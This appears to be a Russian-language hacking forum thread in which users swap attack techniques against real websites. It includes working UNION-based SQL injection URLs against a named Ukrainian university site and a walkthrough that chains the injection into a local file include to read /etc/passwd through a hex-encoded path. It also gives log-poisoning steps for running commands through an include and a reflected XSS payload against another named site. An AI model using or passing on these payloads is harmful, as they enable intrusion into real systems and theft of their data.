Нашёл инъекцию, но после запроса select в скрипте идет запрос update и вылетает ошибка синтаксиса с запросом: SELECT * FROM news WHERE type='show' AND id=-32 union select 1,2,3,4,5,6,7,8,9,10 from users UPDATE news SET count='33' WHERE id=-32 union select 1,2,3,4,5,6,7,8,9,10 from users поле id обрабатывается функцией addslash() и into output не прокатит. Подскажите, как можно посмотреть данные минуя ошибку.
YoriK SELECT * FROM news WHERE type='show' AND id=32 and 2=1 union select 1,2,3,4,5,6,7,8,9,1100 from users%23 почему не канает? 10 колонок, после апдейта вывод в 10
Если в уязвимом скрипте идёт инклуд типа PHP: include("pages/$_GET[act].php"); То можно провести внешний инклуд?
Всё то же самое что и при удаленном. Просто потребуется немного больше времени и немного больше навыков.
тут нормальная не блайнд инъекция http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database(),2,3,4,5--+-&lan=ukr
о ептыть тут еще инклуд есть http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database(),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764,3,4,5--+-&lan=ukr
в php-файле, который исполняется есть строчки примерно такие: PHP: mysql_query("select pole1,pole2 from table1 where id_doc=".$_GET[id_doc]); далее $pole2 = присваивается значение 2 поля. после этого идёт локаьный инклуд файла PHP: main('../'.$pole2); Мы запросом PHP: http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database(),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764,3,4,5--+-&lan=ukr делаем так, чтобы основной запрос вернул ложь, а UNION SELECT запрос вернул данные которые нам нужны. В поле, значение которого потом инклудится, вносим HEX значение строки, так как с ковычками не получилось. PHP: 0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764 это равно ../../../../../etc/passwd соответственно, подставляя во 2 поле в sql-injection путь до искомого файла, он инклудится. Что непонятно - спрашивай.
1. форум античата в длинных строках вставляет пробелы. 2. А про local file include почитай на форуме есть. Скажу одно - это огромный плюс!
скобка не есть комментарий файл passwd даст список юзеров системы, а иногда эта информация может помочь.
Да, это известный прием инклуда лог файла. 1. находим инклуд 2. находим логи /path/log/access_log 3. запрос с cmd на сайт http://site/? ... 4. инклудим через инклуд, найденный в п.1. access_log http://site/include.php?include=/path/log/acces_log&cmd=ls+-lia upd ты права таким способом не поднимаешь, ты просто выполняешь php. ps Изъясняй мысли правильней!!! Я с 5го прочтения тебя понимаю!!!
Вот посмотрите пожалуйста, мне кажется это пассивная XSS?просто я в этом вообще не разбераюсь =)) http://la2.sz.ru/news.php?%22%3E%3Cscript%3Ealert()%3C/script%3Ereadmore=99